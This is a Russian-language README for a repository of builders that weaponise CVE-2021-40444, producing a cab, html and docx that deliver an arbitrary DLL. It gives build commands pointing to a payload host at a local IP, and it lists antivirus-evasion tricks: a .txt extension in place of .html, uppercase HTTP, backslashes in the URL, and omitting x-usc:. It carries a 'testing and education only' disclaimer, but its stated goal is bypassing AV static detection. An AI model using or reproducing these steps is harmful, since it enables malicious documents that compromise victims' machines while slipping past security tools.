
Этот репозиторий содержит сборщики cab-файла, html-файла и docx-файла для эксплойта CVE-2021-40444.
CVE-2021-40444 билдеры
Этот репозиторий содержит билдеры cab-файла, html-файла и docx-файла для эксплуатации CVE-2021-40444. Этот репозиторий предназначен только для тестирования, исследований и образовательных целей. Вы несете ответственность за то, как вы используете код, предоставленный в этом репозитории.
Код разработан путем реверс-инжиниринга образцов вредоносного ПО, найденных в дикой природе и распространенных различными исследователями безопасности.
Билдеры для этой CVE уже являются публичными. Цель этого репозитория — проверить, насколько эффективно мы можем обойти статические детекции различных AV-вендоров для docx-файлов на момент написания.
JS-код можно легко обфусцировать с помощью онлайн-инструментов или вручную. Но docx-файл содержит только один файл — document.xml.rels, на основе которого могут строиться сигнатуры. Что мы можем в нем изменить, чтобы обойти статические детекции большинства антивирусов.
cabrc.exe — это исполняемый файл Microsoft, входящий в состав Internet Explorer Administration Kit, который можно загрузить с https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads, и после установки вы найдете этот exe в «C:\Program Files (x86)\Windows IEAK 11»
Есть 3 билдера.
Код работает на Python 2.7
Сначала перейдите в папку CVE-2021-40444 и поместите туда ваш DLL-файл и переименуйте его в IEcache.inf (или вы можете использовать уже имеющийся там калькулятор DLL).
Затем перейдите в папку source и сгенерируйте cab-файл
c:\cve-2021-40444\sources\python generate_cab.py
Загрузите ваш cab-файл и, используя URL cab-файла, сгенерируйте html-файл
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (Примечание: вместо использования расширения .html, если мы используем .txt, эксплойт все равно работает, но обходит AV)
Теперь, наконец, загрузите ваш html-файл и сгенерируйте doc-файл. Используйте HTTP (заглавными) вместо http и «\» вместо «/», чтобы обойти AV. И нам не нужен x-usc: тоже.
пример: c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\192.168.1.12\new\tests.txt
Результат перед вами.
